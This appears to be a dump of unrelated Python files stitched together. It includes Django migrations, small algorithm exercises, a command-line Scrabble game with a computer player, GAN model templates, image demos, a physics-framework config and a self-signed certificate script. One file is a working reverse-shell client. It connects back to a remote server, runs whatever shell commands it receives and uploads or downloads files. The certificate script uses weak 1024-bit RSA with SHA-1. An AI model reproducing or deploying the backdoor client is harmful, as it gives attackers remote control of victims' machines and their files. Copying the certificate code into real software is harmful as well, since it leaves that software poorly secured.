initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Mentee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nama_mentor', models.CharField(max_length=255)),
('testimoni', models.CharField(max_length=300)),
('experience', models.CharField(max_length=300)),
('foto_mentor', models.ImageField(upload_to='upload')),
],
),
]
|
# /usr/bin/env python
# -*- coding:utf-8 -*-
import heapq
def find_small_k_sums(alist, k):
max_heap = []
if not alist or k < 0 or k > len(alist):
return
for ele in alist:
ele = -ele
if len(max_heap) < k:
heapq.heappush(max_heap, ele)
else:
heapq.heappushpop(max_heap, ele)
return list(map(lambda x: -x, max_heap))
if __name__ == "__main__":
alist = [0, 1, 4, 3, 5, 9, 2, 8, 6]
min_k = find_small_k_sums(alist, 2)
print(min_k) |
S = input()
L = len(S)
Q = 10**9 + 7
anum = [ 0 for _ in range(L+1)] #i番目までのAの個数の合計
cnum = [ 0 for _ in range(L+1)] #i番目までのCの個数の合計
hnum = [ 0 for _ in range(L+1)] #i番目までの?の個数の合計
for i in range(1,L+1):
if S[i-1] == 'A':
anum[i] = anum[i-1] + 1
cnum[i] = cnum[i-1]
hnum[i] = hnum[i-1]
elif S[i-1] == 'B':
anum[i] = anum[i-1]
cnum[i] = cnum[i-1]
hnum[i] = hnum[i-1]
elif S[i-1] == 'C':
anum[i] = anum[i-1]
cnum[i] = cnum[i-1] + 1
hnum[i] = hnum[i-1]
else:
anum[i] = anum[i-1]
cnum[i] = cnum[i-1]
hnum[i] = hnum[i-1] + 1
ans = 0
czen = cnum[L] #全部のCの個数
hzen = hnum[L] #全部の?の個数
for i in range(1,L+1):
if S[i-1] == 'B' or S[i-1] == '?':
A = ((anum[i-1]*pow(3,hnum[i-1],Q))%Q + (hnum[i-1]*pow(3,max(0,hnum[i-1]-1),Q))%Q)%Q
C = (((czen - cnum[i])*pow(3,hzen - hnum[i],Q))%Q + ((hzen - hnum[i])*pow(3,max(0,hzen - hnum[i]-1),Q))%Q)%Q
K = (A*C)%Q
ans = (ans + K)%Q
print(int(ans))
|
import datetime
now = datetime.datetime.now()
print("{}-{}-{}-{}.jpg".format(now.hour, now.minute, now.second, now.microsecond)) |
# Generated by Django 3.0.6 on 2020-06-10 08:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Home', '0007_item_item_image'),
]
operations = [
migrations.AlterField(
model_name='item',
name='item_Discount_pricse',
field=models.FloatField(default=0.0, max_length=30),
),
]
|
# this folder save some global data.
|
import chainer
class Light:
pass
class DirectionalLight(Light):
def __init__(self, color, direction, backside=False):
self.color = color
self.direction = direction
self.backside = backside
class AmbientLight(Light):
def __init__(self, color):
self.color = color
class SpecularLight(Light):
def __init__(self, color, alpha=None, backside=False):
self.color = color
self.backside = backside
if alpha is not None:
self.alpha = alpha
else:
xp = chainer.cuda.get_array_module(color)
self.alpha = xp.ones(color.shape[0], 'float32') |
from django.utils.translation import ugettext_lazy as _
from rest_framework import permissions
from .models import UserProfile
__all__ = [
'IsProfileOwner',
'IsNotAuthenticated'
]
class IsProfileOwner(permissions.IsAuthenticated):
"""
Restrict edit to owners only
"""
message = _("Operation not allowed for insufficient permissions")
def has_object_permission(self, request, view, obj=None):
# in edit request restrict permission to profile owner only
if (request.method in ['PUT', 'PATCH']) and obj is not None:
model = obj.__class__.__name__
user_id = obj.id
# in case of social link view
if model == 'SocialLink':
user_id = obj.user.id
return request.user.id == user_id
else:
return True
def has_permission(self, request, view):
""" applies to social-link-list """
if request.method == 'POST':
user = Profile.objects.only('id', 'username').get(username=view.kwargs['username'])
return request.user.id == user.id
return True
class IsNotAuthenticated(permissions.IsAuthenticated):
"""
Restrict access only to unauthenticated users.
"""
message = _("You must not be authenticated to perform this operation")
def has_permission(self, request, view, obj=None):
if request.user and request.user.is_authenticated():
return False
else:
return True
|
from collections import namedtuple
from multiprocessing.dummy import Pool
from .scrabble_box import Rulebook
from .exceptions import InvalidPlacementError
import sys
class Player(object):
def __init__(self, id, init_tiles, rulebook, name=None):
while name is None:
name = input("Enter the name for human {}: ".format(id))
if name.isspace():
print('Player names must contain non-space characters.')
name = None
self.name = name
self.id = id
"""
We'll save score and word histories. While a score history doesn't have any particular utility, it's more true
to Scrabble tradition and style than just having the current score. Word histories are important to save
so that analysis can be completed after the game is completed, possibly to tune the parameters of the AI in
later incarnations.
"""
self.score_hist = []
self.word_hist = []
self.tiles = init_tiles
# The rulebook for scoring moves and other similar functions
self.rulebook = rulebook
def __str__(self):
return self.name
def get_move(self, board_state):
"""
:param board_state: A list of strings representing the currently played tiles on the scrabble board.
:return: A namedtuple Move defined as ('Move', 'coords word dir')
:rtype namedtuple
"""
pass
def prompt_move(self, board_state):
"""
:param board_state: The current board
:return: A Tuple containing the Move namedtuple the player is performing.
"""
def remove_used_tiles(move):
coords, word, dir = move.coords, move.word, move.dir
# If this is an exchange move, then we don't need to check the contents of the board.
if coords == (-2, -2):
for tile in move.word:
self.tiles.remove(tile)
else:
is_d, is_r = (dir == 'D', dir == 'R')
y, x = coords
for i, tile in enumerate(word.upper()):
# If the board is blank at this point, remove the tile from our tiles.
if board_state[y + i * is_d][x + i * is_r] == ' ':
if tile not in self.tiles and '?' in self.tiles:
tile = '?'
self.tiles.remove(tile)
# Get the next move
move = self.get_move(board_state)
# Check for the skip signal
if move.coords != (-1, -1):
# Remove the tiles from the bag.
remove_used_tiles(move)
return move
def receive_tiles(self, new_tiles):
"""
Recieve new tiles after a successfully played turn.
:param new_tiles: A list of single-character strings representing the Tiles.
:return: None
"""
self.tiles += new_tiles
def set_tiles(self, tiles):
"""
Used for the Game Master to set the player's tiles for testing purposes.
:param tiles: The list of single character strings representing the new tiles.
:return: None
"""
self.tiles = tiles
class HumanPlayer(Player):
"""
This is a class for a human player to interact with the scrabble board directly, interacting with the
Game Master through the command line/terminal interface.
"""
def __init__(self, id, init_tiles, rulebook, name=None):
Player.__init__(self, id, init_tiles, rulebook, name)
def get_move(self, board_state):
"""
:param board_state: The current board
:return: A move tuple representing the player's desired action.
"""
def tiles_present_for_move(move):
"""
Returns true if the human player has all of the tiles required to perform this action.
:param move: namedtuple consisting of coordinates, direction, and word being played.
:return: True if tiles required contained in self.tiles, false otherwise.
"""
tile_copy = self.tiles.copy()
is_d, is_r = (move.dir == 'D', move.dir == 'R')
y, x = move.coords
# Return false if the word doesn't fit here.
if max(y+is_d*len(move.word), x+is_r*len(move.word)) > 14:
return False
for i, tile in enumerate(move.word.upper()):
# If the board is blank at this point, remove the tile from our tiles.
if move.coords == (-2, -2) or board_state[y + i * is_d][x + i * is_r] == ' ':
if tile not in self.tiles and '?' in self.tiles:
tile = '?'
try:
tile_copy.remove(tile)
except ValueError:
return False
return True
Move = namedtuple('move', 'coords dir word')
print("Tiles: [" + str(self.tiles) + "]")
while True:
player_move = input("Action: ")
move_segments = player_move.lower().strip().split(' ')
# If only one word was entered, we check to see if it's one of the exit two valid single-word commands.
if len(move_segments) == 1:
if move_segments[0] == 'skip':
return Move((-1, -1), '', '')
elif move_segments[0] == 'quit':
return Move((-3, -3), '', '')
elif move_segments[0] == 'help':
print("\n".join(["Commands:" "'quit' quits the game", "'skip' skips a turn",
"'exchange' <LETTERS> exchanges some of your tiles",
"'define' <WORD> will define a word previously played",
"'<X> <Y> <D or R> <WORD>' (e.g 7 7 R PYTHON) plays the word in the direction "
"R for right (or D for down), starting at x, y, coordinates 7, 7"]))
else:
print("Command {} not recognized.".format(move_segments[0]))
# The only two-segment command which is valid is exchanging tiles.
elif len(move_segments) == 2:
if move_segments[0] == 'exchange':
if tiles_present_for_move(Move((-2, -2), '', move_segments[1].upper())):
return Move((-2, -2), '', move_segments[1])
else:
print("Tiles for this exchange are not present in your rack.")
elif move_segments[0] == 'define':
print(self.rulebook.define(move_segments[1]))
# Otherwise, we assume this is a regular move and attempt to process it.
elif len(move_segments) == 4:
x, y, direction, word = move_segments
direction = direction.upper()
move = Move((int(y, 16), int(x, 16)), direction, word.upper())
if move.coords[0] < 0 or move.coords[0] < 0 or move.coords[1] > 14 or move.coords[1] > 14:
print('Moves must be within the boundaries 0 and d (d being hexadecimal 14)')
elif direction != 'D' and direction != 'R':
print('direction argument in format <x> <y> <dir> <tiles> must be D or R, not ' + direction)
else:
try:
# Check that we have all of the tiles we're attempting to play.
if not tiles_present_for_move(move):
print("The player's tile rack does not contain the tiles needed for this move.")
else:
if self.rulebook.score_move(move, board_state) < 0:
print('This word, or an ancillary word formed, is invalid, or the word does not border'
'an existing tile on the board.')
else:
return move
except InvalidPlacementError:
print(InvalidPlacementError)
else:
print("Command {} not recognized. Type 'help' for help".format(move_segments[0]))
class ComputerPlayer(Player):
"""
Computer-Controlled Competitor
"""
def __init__(self, id, init_tiles, rulebook, name=None):
# Call the default constructor to set name and tiles
Player.__init__(self, id, init_tiles, rulebook, name)
def find_words(self, tiles=None, starting_branch=None, fixed_tiles=(), pos=0, min_length=2, max_length=15):
"""
:param tiles: A list of single-characters representing the player's tiles.
:param starting_branch: The starting branch in the dictionary tree which we'll be exploring
:param fixed_tiles: A list of tuples containing a character and the zero-indexed position in the created word
in which the tile must occur. For example, if the second letter of the word must be 'A' and the third
letter of the word must be 'M', this variable would be [('A',1), ('M',2)].
:param pos: The current position in the word.
:param min_length: The shortest a generated word can be, dictated by the number of tiles until a played piece
borders an existing piece on the board.
:param max_length: The longest a generated word can be, dictated by the coordinates on which the first tile
will be placed.
:return: A list of valid words which can be formed using the tiles in the rack and with the mandated positions
of the tiles given.
"""
if pos > max_length:
return []
if tiles is None:
tiles = self.tiles.copy()
if starting_branch is None:
starting_branch = self.rulebook.dictionary_root
assert (len(fixed_tiles) == 1 or
all([fixed_tiles[i][1] < fixed_tiles[i + 1][1] for i in range(len(fixed_tiles) - 1)]))
"""
If the word at our current branch is valid, then we'll return it as a possible valid word, but only if there
aren't required tiles upcoming which would directly attach to this word. For example, if we had the word at our
current branch 'PIE' with fixed tile ('S', 3), we wouldn't have PIE be a valid word as the word which would
actually be formed on the board is PIES, and it's much easier to check for that case now rather than appending
trailing tiles to the board once it has been played.
"""
if starting_branch['VALID'] and len(starting_branch['WORD']) >= min_length and len(tiles) < len(self.tiles):
if not fixed_tiles or fixed_tiles[0][1] > len(starting_branch['WORD']):
valid_words = [starting_branch['WORD']]
else:
valid_words = []
else:
valid_words = []
# If our current position features a mandated tile, then we check to see if that's a valid entry at this point
# in the tree
if fixed_tiles and fixed_tiles[0][1] == pos:
if fixed_tiles[0][0] in starting_branch:
valid_words += self.find_words(tiles=tiles,
starting_branch=starting_branch[fixed_tiles[0][0]],
fixed_tiles=fixed_tiles[1:],
pos=pos + 1,
min_length=min_length,
max_length=max_length)
else:
# Casting tile to a set ensures we don't doubly traverse a branch in the case of repeated letters.
for tile in set(tiles):
new_tiles = tiles.copy()
new_tiles.remove(tile)
if tile == '?':
words_with_blanks = []
for key, value in starting_branch.items():
if key != 'VALID' and key != 'WORD':
words_with_blanks += self.find_words(tiles=new_tiles,
starting_branch=starting_branch[key],
pos=pos + 1,
min_length=min_length,
max_length=max_length,
fixed_tiles=fixed_tiles)
# We lower the character replacing '?' to signify it being a former blank tile on the board.
words_with_blanks = [word[:pos] + word[pos].lower() + word[pos + 1:] for word in
words_with_blanks]
valid_words += words_with_blanks
else:
# In the case of blank tiles, we traverse every branch
if tile in starting_branch:
valid_words += self.find_words(tiles=new_tiles,
starting_branch=starting_branch[tile],
pos=pos + 1,
min_length=min_length,
max_length=max_length,
fixed_tiles=fixed_tiles)
return valid_words
def get_move_params(self, coords, direction, board_state):
"""
Asserts that the number of tiles can be placed in the direction dir with the coordinates coords.
Returns the (zero indexed) number of tiles until this becomes valid, and the ultimate length of the move.
For example, if we're trying to place seven tiles across line '_ _ A _ _ _ _ _ _ _ _ _ _ _ _ ' from the first
position, the result would be (2, 8, [(2, A)] as it becomes valid at tile 2 and the maximum number of
letters in the result will be six.
:param coords: y and x integer coordinates in tuple
:param direction: string direction 'D' or 'R' for down or right.
:param board_state: The list of strings currently representing the tiles played on the board.
:return a tuple containing the minimum word length and the locations in the word of
pre-placed tiles.
:rtype tuple (int, list)
"""
def is_island(y, x):
"""
Checks to see if the given coordinate is an island in scrabble terms, meaning that there is no tile
directly above, below, to the left, or to the right of it, though diagonals are of course still valid.
:param y: Integer Y coordinate
:param x: Integer X coordinate
:return: True if the coordinates has no existing tile on any side.
"""
# All first moves will be an island, but we'll of return false so the game can begin.
if (y, x) == (7, 7):
return False
min_x, max_x = max(x - 1, 0), min(x + 1, 14)
min_y, max_y = max(y - 1, 0), min(y + 1, 14)
for near_y in range(min_y, max_y + 1):
if board_state[near_y][x] != ' ':
return False
for near_x in range(min_x, max_x + 1):
if board_state[y][near_x] != ' ':
return False
return True
# TODO: remove assertions used in testing
assert (direction == 'D' or direction == 'R')
start_y, start_x = coords
y, x = coords
fixed_tiles = []
tiles_rem = len(self.tiles)
tiles_to_validity = -1
if direction == 'D':
"""
If the direction is down, then we first check that there is no tile played directly above us, as if that is
the case then we'd be far better to calculate from that point rather than to allow a move to be formulated
here and only later check if it aligns with the leading tile.
"""
if y > 0 and board_state[y-1][x] != ' ':
return -1, []
while y < 15 and (tiles_rem or board_state[y][x] != ' '):
if tiles_to_validity == -1:
if not is_island(y, x):
tiles_to_validity = y - start_y + 1
if board_state[y][x] == ' ':
tiles_rem -= 1
else:
fixed_tiles.append((board_state[y][x], y - start_y))
y += 1
return tiles_to_validity, fixed_tiles
else:
"""
Similarly, if going right we first check there's no tile to our immediate left.
"""
if x > 0 and board_state[y][x-1] != ' ':
return -1, []
while x < 15 and (tiles_rem or board_state[y][x] != ' '):
if tiles_to_validity == -1:
if not is_island(y, x):
tiles_to_validity = x - start_x + 1
if board_state[y][x] == ' ':
tiles_rem -= 1
else:
fixed_tiles.append((board_state[y][x], x - start_x))
x += 1
return tiles_to_validity, fixed_tiles
def get_valid_locations(self, board_state):
"""
:return: A list of "MoveParam" named tuples, containing the coordinates, orientation, min word length
and max word length for perspective moves.
"""
MoveParam = namedtuple('MoveParam', 'coords dir min max fixed')
valid_move_params = []
for y in range(15):
for x in range(15):
for direction in ['D', 'R']:
min_len, fixed_tiles = self.get_move_params((y, x), direction, board_state)
if min_len != -1:
if direction == 'D':
valid_move_params.append(MoveParam((y, x), direction, min_len, 15-y, fixed_tiles))
else:
valid_move_params.append(MoveParam((y, x), direction, min_len, 15-x, fixed_tiles))
return valid_move_params
def get_move(self, board_state):
"""
First, we look at all the positions on the board and determine which coordinates can be the starting position
for a word, the minimum length of a word which adheres to the placement rules of scrabble, and the maximum
length of a word formed this point.
"""
valid_locations = self.get_valid_locations(board_state)
"""
Knowing where we can place words and how long the words can be moved, as well as what tiles this move would
be forced to incorporate, we can find what valid words we can play.
"""
Move = namedtuple('move', 'coords dir word')
valid_moves = []
for vl in valid_locations:
valid_words = self.find_words(fixed_tiles=vl.fixed, min_length=max(2, vl.min), max_length=vl.max)
valid_moves += [Move(vl.coords, vl.dir, word) for word in valid_words]
# Now we score our prospective moves, and remove the invalid ones.
move_scores = [(move, self.move_heuristic(move, board_state)) for move in valid_moves]
move_scores = sorted(move_scores, key=lambda x: x[1], reverse=True)
if move_scores and move_scores[0][1] > 0:
self.word_hist.append(move_scores[0][0].word)
self.score_hist.append(move_scores[0][1])
return move_scores[0][0]
else:
# If no legal moves are available, we send the skip signal which is coordinates of -1, -1
return Move((-1, -1), '', '')
def move_heuristic(self, move, board_state):
"""
Return a positive value representing the current value of a move, or -1 if the move is impossible.
TODO: GA Approach to heuristic.
"""
return self.rulebook.score_move(move, board_state)
|
#!/usr/bin/python
from OpenSSL import crypto, SSL
from os.path import exists, join
CERT_FILE = 'cert.crt'
KEY_FILE = 'cert.key'
#print CERT_FILE
#print KEY_FILE
def create_self_signed_cert(cert_dir):
"""
If cert.crt and cert.key don't exist in /etc/nginx, create a new
self-signed cert and keypair and write them into that directory.
"""
if not exists(join(cert_dir, CERT_FILE)) or not exists(join(cert_dir, CERT_FILE)):
#create a Key pair
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, 1024)
print k
#create a self-signed cert
cert = crypto.X509()
cert.get_subject().C = "IN"
cert.get_subject().ST = "AP"
cert.get_subject().L = "HYDERABAD"
cert.get_subject().O = "Nexiilabs"
cert.get_subject().OU = "DEVOPS"
# cert.get_subject().CN = CN
cert.set_issuer(cert.get_subject())
cert.set_pubkey(k)
cert.sign(k, 'sha1')
open(join(cert_dir, CERT_FILE), "wt").write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
open(join(cert_dir,KEY_FILE), "wt").write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
create_self_signed_cert("/etc/nginx")
|
name = input("enter your name : ")
lst = ['a','e','i','o','u']
c = 0
for n in name:
if n in lst:
c+=1
print(c)
print(len(list(filter(lambda x:x in lst , list(name)))))
print(len(list(filter(lambda x:x in lst , name)))) |
# Разобраться с получением email письма. Попробуйте поискать информацию самостоятельно (IMAP или POP3 протоколы
# получения писем).
|
import socket
import subprocess
import json
import os
# import speech_recognition as sr
import base64
class Client:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # here socket.AF_INET is your ipv4 and
# socket.SOCK_STREAM is your tcp/ip
self.connection.connect((ip, port)) # connection back to server
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True) # returning system command output
def send_data(self, command):
json_data = json.dumps(command) # dump data into json object
self.connection.send(json_data.encode()) # sending json object back to server
def write_file(self, path, data):
with open(path, "wb") as file:
file.write(base64.b64decode(data)) # write file to local file system
return "[+] Upload successful."
def receive_data(self):
json_data = b""
while True:
try:
json_data = json_data + self.connection.recv(1024) # receiving json object from server
return json.loads(json_data) # unwrap json object
except ValueError:
continue # if still data is pending continue the process
def change_directory(self, path):
os.chdir(path)
return "[+] Changing Working Directory to " + path
# def record_mic(self, seconds): Yet to complete
# recognizer = sr.Recognizer()
# with sr.Microphone() as source:
# recognizer.adjust_for_ambient_noise(source)
# recorded_audio = recognizer.listen(source, timeout=5, phrase_time_limit=10)
# try:
# speech_to_text = recognizer.recognize_google(recorded_audio, language="en-US")
# return speech_to_text
# except Exception as e:
# print(e)
def read_file(self, path):
with open(path, "rb") as file: # reading file in binary to send data to server
return base64.b64encode(file.read()) # base64 is use to encode unknown characters
def run(self):
while True:
command = self.receive_data()
try:
if command[0] == "exit":
self.connection.close()
exit()
elif command[0] == "cd" and len(command) > 1:
command_result = self.change_directory(command[1])
# elif command[0] == "record" and command[1] == "mic" and len(command) > 2:
# command_result = self.record_mic(command[2])
elif command[0] == "download":
command_result = self.read_file(command[1]).decode()
elif command[0] == "upload":
command_result = self.write_file(command[1], command[2]) # get path and content of file
else:
command_result = self.execute_system_command(command).decode()
except Exception as e:
command_result = str(e) # send error to server
self.send_data(command_result)
client = Client("", ) # use public ip of server to connect back
client.run()
|
# Uses python3
import sys
def optimal_sequence(n):
sequence = []
while n >= 1:
sequence.append(n)
if n % 3 == 0:
n = n // 3
elif n % 2 == 0:
n = n // 2
else:
n = n - 1
return reversed(sequence)
def dynamic_sequence(n):
all_possible_numbers = [0, 0]
for i in range(2, n+1):
min_count = all_possible_numbers[i-1] + 1
if i % 3 == 0:
min_count_3 = all_possible_numbers[i//3] + 1
if min_count_3 < min_count:
min_count = min_count_3
if i % 2 == 0:
min_count_2 = all_possible_numbers[i//2] + 1
if min_count_2 < min_count:
min_count = min_count_2
all_possible_numbers.append(min_count)
sequence = []
while n >= 1:
sequence.append(n)
if n % 3 == 0 and all_possible_numbers[n//3] == all_possible_numbers[n] - 1:
n = n//3
elif n % 2 == 0 and all_possible_numbers[n//2] == all_possible_numbers[n] - 1:
n = n//2
else :
n = n - 1
return reversed(sequence)
input = sys.stdin.read()
n = int(input)
# sequence = list(optimal_sequence(n))
sequence = list(dynamic_sequence(n))
print(len(sequence) - 1)
for x in sequence:
print(x, end=' ')
|
import numpy as np
import torch.nn as nn
from vegans.utils import get_input_dim
from vegans.utils.layers import LayerReshape
class MyGenerator(nn.Module):
def __init__(self, gen_in_dim, x_dim):
super().__init__()
self.hidden_part = nn.Sequential(
nn.Flatten(),
nn.Linear(np.prod(gen_in_dim), 128),
nn.LeakyReLU(0.2),
nn.Linear(128, 256),
nn.LeakyReLU(0.2),
nn.BatchNorm1d(256),
nn.Linear(256, 512),
nn.LeakyReLU(0.2),
nn.BatchNorm1d(512),
nn.Linear(512, 1024),
nn.LeakyReLU(0.2),
nn.BatchNorm1d(1024),
nn.Linear(1024, int(np.prod(x_dim))),
LayerReshape(x_dim)
)
self.output = nn.Sigmoid()
def forward(self, x):
x = self.hidden_part(x)
return self.output(x)
def load_example_generator(x_dim, z_dim, y_dim=None):
""" Load some example architecture for the generator.
Parameters
----------
x_dim : integer, list
Indicating the number of dimensions for the real data.
z_dim : integer, list
Indicating the number of dimensions for the latent space.
y_dim : integer, list, optional
Indicating the number of dimensions for the labels.
Returns
-------
torch.nn.Module
Architectures for generator,.
"""
if y_dim is not None:
gen_in_dim = get_input_dim(dim1=z_dim, dim2=y_dim)
else:
gen_in_dim = z_dim
return MyGenerator(gen_in_dim=gen_in_dim, x_dim=x_dim)
class MyAdversary(nn.Module):
def __init__(self, adv_in_dim, first_layer, last_layer):
super().__init__()
self.hidden_part = nn.Sequential(
first_layer,
nn.Flatten(),
nn.Linear(np.prod(adv_in_dim), 512),
nn.LeakyReLU(0.2),
nn.Linear(512, 256),
nn.LeakyReLU(0.2),
)
self.feature_part = nn.Linear(256, 1)
self.output = last_layer()
def forward(self, x):
x = self.hidden_part(x)
x = self.feature_part(x)
return self.output(x)
def load_example_adversary(x_dim, y_dim=None, adv_type="Critic"):
""" Load some example architecture for the adversary.
Parameters
----------
x_dim : integer, list
Indicating the number of dimensions for the real data.
y_dim : integer, list, optional
Indicating the number of dimensions for the labels.
Returns
-------
torch.nn.Module
Architectures for adversary.
"""
possible_types = ["Discriminator", "Critic"]
if adv_type == "Critic":
last_layer = nn.Identity
elif adv_type == "Discriminator":
last_layer = nn.Sigmoid
else:
raise ValueError("'adv_type' must be one of: {}.".format(possible_types))
x_dim = [x_dim] if isinstance(x_dim, int) else x_dim
if y_dim is not None:
adv_in_dim = get_input_dim(dim1=x_dim, dim2=y_dim)
else:
adv_in_dim = x_dim
if len(adv_in_dim) == 3 and np.prod(adv_in_dim)>1024:
first_layer = nn.Conv2d(in_channels=adv_in_dim[0], out_channels=3, kernel_size=5, stride=2)
out_pixels_x = int((adv_in_dim[1] - (5 - 1) - 1) / 2 + 1)
out_pixels_y = int((adv_in_dim[2] - (5 - 1) - 1) / 2 + 1)
adv_in_dim = (3, out_pixels_x, out_pixels_y)
else:
first_layer = nn.Identity()
return MyAdversary(adv_in_dim=adv_in_dim, first_layer=first_layer, last_layer=last_layer)
class MyEncoder(nn.Module):
def __init__(self, enc_in_dim, z_dim, first_layer):
super().__init__()
self.hidden_part = nn.Sequential(
first_layer,
nn.Flatten(),
nn.Linear(np.prod(enc_in_dim), 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 128),
nn.LeakyReLU(0.2),
nn.Linear(128, np.prod(z_dim)),
LayerReshape(z_dim)
)
self.output = nn.Identity()
def forward(self, x):
x = self.hidden_part(x)
return self.output(x)
def load_example_encoder(x_dim, z_dim, y_dim=None):
""" Load some example architecture for the encoder.
Parameters
----------
x_dim : integer, list
Indicating the number of dimensions for the real data.
z_dim : integer, list
Indicating the number of dimensions for the latent space.
y_dim : None, optional
Indicating the number of dimensions for the labels.
Returns
-------
torch.nn.Module
Architectures for encoder.
"""
z_dim = [z_dim] if isinstance(z_dim, int) else z_dim
if y_dim is not None:
enc_in_dim = get_input_dim(dim1=x_dim, dim2=y_dim)
else:
enc_in_dim = x_dim
if len(enc_in_dim) == 3 and np.prod(enc_in_dim)>1024:
first_layer = nn.Conv2d(in_channels=enc_in_dim[0], out_channels=3, kernel_size=5, stride=2)
out_pixels_x = int((enc_in_dim[1] - (5 - 1) - 1) / 2 + 1)
out_pixels_y = int((enc_in_dim[2] - (5 - 1) - 1) / 2 + 1)
enc_in_dim = (3, out_pixels_x, out_pixels_y)
else:
first_layer = nn.Identity()
return MyEncoder(enc_in_dim=enc_in_dim, z_dim=z_dim, first_layer=first_layer)
class MyDecoder(nn.Module):
def __init__(self, x_dim, dec_in_dim):
super().__init__()
self.hidden_part = nn.Sequential(
nn.Flatten(),
nn.Linear(np.prod(dec_in_dim), 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 128),
nn.LeakyReLU(0.2),
nn.Linear(128, np.prod(x_dim)),
LayerReshape(x_dim)
)
self.output = nn.Identity()
def forward(self, x):
x = self.hidden_part(x)
return self.output(x)
def load_example_decoder(x_dim, z_dim, y_dim=None):
""" Load some example architecture for the decoder.
Parameters
----------
x_dim : integer, list
Indicating the number of dimensions for the real data.
z_dim : integer, list
Indicating the number of dimensions for the latent space.
y_dim : None, optional
Indicating the number of dimensions for the labels.
Returns
-------
torch.nn.Module
Architectures for decoder.
"""
x_dim = [x_dim] if isinstance(x_dim, int) else x_dim
if y_dim is not None:
dec_in_dim = get_input_dim(dim1=z_dim, dim2=y_dim)
else:
dec_in_dim = z_dim
return MyDecoder(x_dim=x_dim, dec_in_dim=dec_in_dim)
class MyAutoEncoder(nn.Module):
def __init__(self, adv_in_dim, x_dim, first_layer):
super().__init__()
self.hidden_part = nn.Sequential(
first_layer,
nn.Flatten(),
nn.Linear(np.prod(adv_in_dim), 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 128),
nn.LeakyReLU(0.2),
nn.Linear(128, 32),
nn.LeakyReLU(0.2),
nn.Linear(32, 128),
nn.LeakyReLU(0.2),
nn.Linear(128, 256),
nn.LeakyReLU(0.2),
nn.Linear(256, np.prod(x_dim)),
LayerReshape(x_dim)
)
self.output = nn.Identity()
def forward(self, x):
x = self.hidden_part(x)
return self.output(x)
def load_example_autoencoder(x_dim, y_dim=None):
""" Load some example architecture for the auto-encoder.
Parameters
----------
x_dim : integer, list
Indicating the number of dimensions for the real data.
y_dim : integer, list, optional
Indicating the number of dimensions for the labels.
Returns
-------
torch.nn.Module
Architectures for autoencoder.
"""
if y_dim is not None:
adv_in_dim = get_input_dim(dim1=x_dim, dim2=y_dim)
else:
adv_in_dim = x_dim
if len(adv_in_dim) == 3 and np.prod(adv_in_dim)>1024:
first_layer = nn.Conv2d(in_channels=adv_in_dim[0], out_channels=3, kernel_size=5, stride=2)
out_pixels_x = int((adv_in_dim[1] - (5 - 1) - 1) / 2 + 1)
out_pixels_y = int((adv_in_dim[2] - (5 - 1) - 1) / 2 + 1)
adv_in_dim = (3, out_pixels_x, out_pixels_y)
else:
first_layer = nn.Identity()
return MyAutoEncoder(adv_in_dim=adv_in_dim, x_dim=x_dim, first_layer=first_layer) |
import numpy as np
from matplotlib import pyplot as plt
if __name__ == "__main__":
# Black/White Image (1d)
image = np.array(
[0, 1, 1, 1, 1, 1, 0, 0, 0, ],
dtype=np.uint8,
)
print(f"B/W (1D):\n{image}")
plt.imshow(image.reshape((3, 3)), cmap="gray")
plt.show()
# Grayscale Image (2d)
image = np.array(
[[0, 100, 100],
[255, 255, 255],
[100, 100, 0]],
dtype=np.uint8,
)
print(f"Gray (2D):\n{image}")
plt.imshow(image, cmap="gray")
plt.show()
# RGB Image (3d)
# R G B
image = np.array([[[100, 42, 78],
[220, 47, 153]],
[[100, 42, 78],
[220, 47, 153]]], dtype=np.uint8)
print(f"RGB (3D):\n{image}")
plt.imshow(image)
plt.show()
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("SVFitProducer")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.Services_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('JetMETCorrections.Configuration.JetCorrectionProducers_cff')
process.load('RecoMET.METPUSubtraction.mvaPFMET_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_38T_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1000))
process.source = cms.Source("PoolSource",
# replace 'myfile.root' with the source file you want to use
fileNames = cms.untracked.vstring(
'file:/afs/cern.ch/work/m/molszews/CMSSW/Data/Phys14MiniAOD/GluGluToHToTauTau_M-125_13TeV-powheg-pythia6.root'
)
)
process.out = cms.OutputModule("PoolOutputModule",
outputCommands = cms.untracked.vstring( "keep *",
"drop *_*_*_run",
"keep *_svfit_*_*",
"keep *_leptonPairWithMet_*_*"),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('p')),
fileName = cms.untracked.string('/afs/cern.ch/work/m/molszews/CMSSW/Data/SVFitProducer.root')
)
# Other statements
from Configuration.AlCa.GlobalTag_condDBv2 import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
process.load("RecoJets.JetProducers.ak4PFJets_cfi")
process.ak4PFJets.src = cms.InputTag("packedPFCandidates")
from JetMETCorrections.Configuration.DefaultJEC_cff import ak4PFJetsL1FastL2L3
process.load("RecoMET.METPUSubtraction.mvaPFMET_cff")
#process.pfMVAMEt.srcLeptons = cms.VInputTag("slimmedElectrons")
process.pfMVAMEt.srcPFCandidates = cms.InputTag("packedPFCandidates")
process.pfMVAMEt.srcVertices = cms.InputTag("offlineSlimmedPrimaryVertices")
process.puJetIdForPFMVAMEt.jec = cms.string('AK4PF')
